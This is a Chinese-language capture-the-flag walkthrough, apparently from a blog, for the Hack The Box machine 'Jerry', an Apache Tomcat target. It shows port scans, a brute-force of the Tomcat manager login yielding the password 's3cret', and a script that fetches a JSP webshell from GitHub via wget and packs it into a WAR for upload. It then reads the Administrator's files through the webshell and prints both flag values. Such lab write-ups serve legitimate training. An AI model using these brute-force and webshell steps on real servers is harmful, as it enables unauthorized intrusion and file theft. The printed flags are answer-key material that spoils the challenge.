[Meachines] [Easy] jerry Tomcat用户暴力破解+war包webshell上传

信息收集

IP Address Opening Ports
10.10.10.95 TCP:8080

$ sudo masscan -p1-65535 10.10.10.95 --rate=1000 -e tun0 > /tmp/ports

$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')

$ nmap -p$ports 10.10.10.95 --min-rate 1000 -sC -sV -Pn

bash 复制代码
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.89 seconds

Tomcat

https://github.com/bl4de/security-tools/blob/master/apache-tomcat-login-bruteforce.py

爆破tomcat密码

$ python3 apache-tomcat-login-bruteforce.py -H 10.10.10.95

s3cret

创建 WAR 包

bash 复制代码
# gen_war.sh
#!/bin/sh 
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp 
rm -rf wshell 
rm -f wshell.war 
mkdir wshell 
cp index.jsp wshell/ 
cd wshell 
jar -cvf ../wshell.war * 

$ chmod +x gen_war.sh

$ ./gen_war.sh

可以直接通过这个目录找到两个Flag

http://10.10.10.95:8080/wshell/?sort=1&file=C%3A%5CUsers%5CAdministrator%5CDesktop%5Cflags%5C2+for+the+price+of+1.txt

User.txt

7004dbcef0f854e0fb401875f26ebd00

Root.txt

04a8b36e1545a455393d067e772fe90e

相关推荐
古月฿2 分钟前
大学生素质测评系统设计与实现
java·vue.js·redis·mysql·spring·毕业设计
一雨方知深秋3 分钟前
程序流程控制
java·for循环·while循环·if分支·switch分支·dowhile循环·嵌套循环
cike_y7 分钟前
JSP标签&JSTL标签&EL表达式
java·开发语言·jsp
秃然想通10 分钟前
Java继承详解:从零开始理解“父子关系”编程
java·开发语言
嘻嘻嘻开心11 分钟前
List集合接口
java·开发语言·list
源码获取_wx:Fegn089512 分钟前
基于springboot + vue物业管理系统
java·开发语言·vue.js·spring boot·后端·spring·课程设计
cike_y18 分钟前
JavaWeb-JDBC&事务回滚
java·开发语言·javaweb
郑州光合科技余经理1 小时前
实战:攻克海外版同城生活服务平台开发五大挑战
java·开发语言·javascript·数据库·git·php·生活
蟹至之1 小时前
【MySQL】JDBC的使用(万字解析)
java·数据库·mysql·jdbc
爱笑的眼睛111 小时前
超越翻转与裁剪:面向生产级AI的数据增强深度实践与多模态演进
java·人工智能·python·ai